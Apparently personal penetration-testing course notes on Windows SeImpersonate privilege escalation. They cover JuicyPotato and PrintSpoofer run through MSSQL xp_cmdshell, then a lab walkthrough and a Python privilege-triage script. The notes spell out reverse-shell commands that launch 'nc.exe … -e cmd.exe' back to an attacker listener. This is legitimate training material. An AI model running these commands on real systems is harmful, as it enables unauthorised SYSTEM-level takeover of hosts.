# Intro

- In Windows, every process has a token that holds information about the account running it
- These tokens are not considered secure resources in themselves, as they are just locations within memory that could be brute-forced by users who cannot read memory
- To utilize the token, the `SeImpersonate` privilege is needed
- It is only given to admin accounts and can be removed during system hardening
- Legitimate programs may utilize another process's token to escalate from Administrator to Local System, which has additional privs
- NOTE: We will often run into this privilege after gaining RCE via an app that runs in the context of a service account
- Attackers often abuse this privilege in the "Potato style" privescs, where a service account can `SeImpersonate` but does not hold full SYSTEM-level privileges
- In short, the Potato attack tricks a process running as SYSTEM into connecting to the attacker's process, which hands over the token to be used
- This [paper](https://github.com/hatRiot/token-priv/blob/master/abusing_token_eop_1.0.txt) is worth reading for further details on token impersonation attacks

# JuicyPotato

- Assume for this example that we gained a foothold on a SQL server using a privileged SQL user
- Client connections to IIS and SQL Server may be configured to use Windows Authentication
- The server may then need to access other resources, such as file shares, as the connecting client
- It can do this by impersonating the user in whose context the client connection is established. To do so, the service account will be granted the [Impersonate a client after authentication](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/impersonate-a-client-after-authentication) priv
- Continuing with this example, the SQL Server service account is running in the context of the default `mssqlserver` account
- Imagine we have achieved command execution as this user via `xp_cmdshell`, using a set of credentials obtained from a `logins.sql` file found on a file share with the `Snaffler` tool

## Connect with `mssqlclient.py`

- Using the creds found in the `logins.sql` file, connect to the SQL server

```bash
mssqlclient.py [email protected] -windows-auth
```

- Now enable `xp_cmdshell` and check privs

```mssql
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami
SQL> xp_cmdshell whoami /priv
```

- Above, the `whoami /priv` output confirms that the `nt service\mssql$sqlexpress01` user has the SeImpersonate priv

## Privesc with JuicyPotato

- [JuicyPotato](https://github.com/ohpe/juicy-potato) can be used to exploit the `SeImpersonate` or `SeAssignPrimaryToken` privs via DCOM/NTLM reflection abuse to impersonate a privileged account such as `NT AUTHORITY\SYSTEM`
- First, download the `JuicyPotato.exe` and `nc.exe` bins on Kali and move both to the target server
- Next, set up a listener on Kali

```bash
sudo nc -lvnp 8443
```

- Then, execute `JuicyPotato.exe` as below, where `-l` is the COM server listening port, `-p` is the program to launch (i.e., `cmd.exe`), `-a` is the argument passed to `cmd.exe`, and `-t` is the `createprocess` call

```mssql
SQL> xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.15.160 8443 -e cmd.exe" -t *
```

# PrintSpoofer and RoguePotato

- `JuicyPotato` doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards
- However, [PrintSpoofer](https://github.com/itm4n/PrintSpoofer) and [RoguePotato](https://github.com/antonioCoco/RoguePotato) can be used to leverage the same privileges and gain `NT AUTHORITY\SYSTEM` level access
- This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse the SeImpersonate priv on Windows 10 and Server 2019 hosts where `JuicyPotato` no longer works

## Privesc with PrintSpoofer

- Like before, connect with `mssqlclient.py`
- Download the `PrintSpoofer.exe` and `nc.exe` bins on Kali and move both to the target server
- Next, set up a listener on Kali
- Finally, execute `PrintSpoofer.exe`

```mssql
SQL> xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
```

---

# Exercise

- `ping` test
![[images/Pasted image 20260218200040.png]]
- `nmap` scan
![[images/Pasted image 20260218200148.png]]
- connect to target's mssql server on port 1433 using `mssqlclient.py` with given creds
![[images/Pasted image 20260218195109.png]]
- enable `xp_cmdshell`
![[images/Pasted image 20260218195523.png]]
- enum target's OS version and current user's privs
![[images/Pasted image 20260218195605.png]]
![[images/Pasted image 20260218200137.png]]
- this target is vulnerable to `JuicyPotato` because it is pre-Server 2019
- download `nc.exe` and `JuicyPotato`
![[images/Pasted image 20260218200001.png]]
- move to target
  > actually these tools already exist on the target
![[images/Pasted image 20260218200459.png]]
- execute `juicypotato.exe`
![[images/Pasted image 20260218200944.png]]
- we have a hit on our listener
![[images/Pasted image 20260218200952.png]]
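As an added example (not part of these notes or of the tools they reference), a small Python triage script that automates the two checks the exercise does by hand: parsing `whoami /priv` for `SeImpersonatePrivilege`/`SeAssignPrimaryTokenPrivilege` and reading the OS build to tell a pre-Server 2019 host from one where JuicyPotato no longer applies. The sample outputs are constructed; using `systeminfo` for the OS version and build 17763 as the Windows 10 1809 / Server 2019 threshold are my assumptions, and the same check doubles as a hardening audit of whether a service account still holds the impersonation privilege.

```python
"""Added triage helper: flag impersonation privileges in `whoami /priv` output and
check whether the host build predates Server 2019 / Windows 10 1809 (build 17763)."""
import re

# Privileges the page names as the ones the Potato-style tools abuse.
IMPERSONATION_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}
BUILD_1809 = 17763  # build number of Windows 10 1809 / Server 2019 (assumed threshold)

# Constructed sample output, modelled on the page's `xp_cmdshell whoami /priv` step.
WHOAMI_PRIV = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""
# Constructed `systeminfo` excerpt for a Windows Server 2016 host (build 14393).
SYSTEMINFO = """\
Host Name:                 SQL01
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
"""

def parse_whoami_priv(text):
    """Map each privilege name in `whoami /priv` output to its Enabled/Disabled state."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*\s(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def parse_build(text):
    """Return the build number from the `OS Version:` line of `systeminfo`, or None."""
    m = re.search(r"^OS Version:\s+\d+\.\d+\.(\d+)", text, re.MULTILINE)
    return int(m.group(1)) if m else None

def triage(whoami_text, systeminfo_text):
    """Summarise which impersonation privs are held and whether the build predates 1809."""
    privs = parse_whoami_priv(whoami_text)
    build = parse_build(systeminfo_text)
    return {
        "impersonation_privs": {p: s for p, s in privs.items() if p in IMPERSONATION_PRIVS},
        "build": build,
        "pre_1809": build is not None and build < BUILD_1809,  # JuicyPotato-era host?
    }
```

A hardened host should report an empty `impersonation_privs` dict for the SQL service account; `pre_1809` only says which family of tool the page describes applies, not that the host is exploitable.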